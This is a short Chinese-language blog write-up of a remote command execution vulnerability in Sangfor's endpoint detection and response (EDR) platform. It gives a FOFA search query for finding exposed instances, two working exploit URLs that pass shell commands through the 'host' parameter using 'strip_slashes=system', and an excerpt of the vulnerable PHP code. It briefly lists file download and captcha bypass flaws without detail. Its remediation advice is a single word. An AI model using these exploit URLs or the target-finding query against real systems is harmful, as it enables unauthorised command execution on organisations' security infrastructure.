0x01 前言
昨天睡得正香,突然公司售前就呼來電話,問某某edr出現啥問題了,然后我就給他講了一遍,這個月太忙了,沒時間寫博客,今天繼續來水一篇。
其次大哥來波最真摯的簡介:
深信服終端檢測響應平台EDR,圍繞終端資產安全生命周期,通過預防、防御、檢測、響應賦予終端更為細致的隔離策略、更為精准的查殺能力、更為持續的檢測能力、更為快速的處置能力。在應對高級威脅的同時,通過雲網端聯動協同、威脅情報共享、多層級響應機制,幫助用戶快速處置終端安全問題,構建輕量級、智能化、響應快的下一代終端安全系統。
0x02 影響范圍
fofa關鍵字搜索:title=”終端檢測響應平台”
0x03 遠程命令執行
漏洞位置:host 參數
https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=id
https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=pwd
0x04 RCE分析
echo "<p><b>Log Helper</b></p>";
$show_form($_REQUEST);跟入show_form
/**
* 顯示表單
* @param array $params 請求參數
* @return
*/
$show_form = function($params) use(&$strip_slashes, &$show_input) {
extract($params);
$host = isset($host) ? $strip_slashes($host) : "127.0.0.1";
任意文件下載漏洞
驗證碼繞過
0x05 整改建議
更新……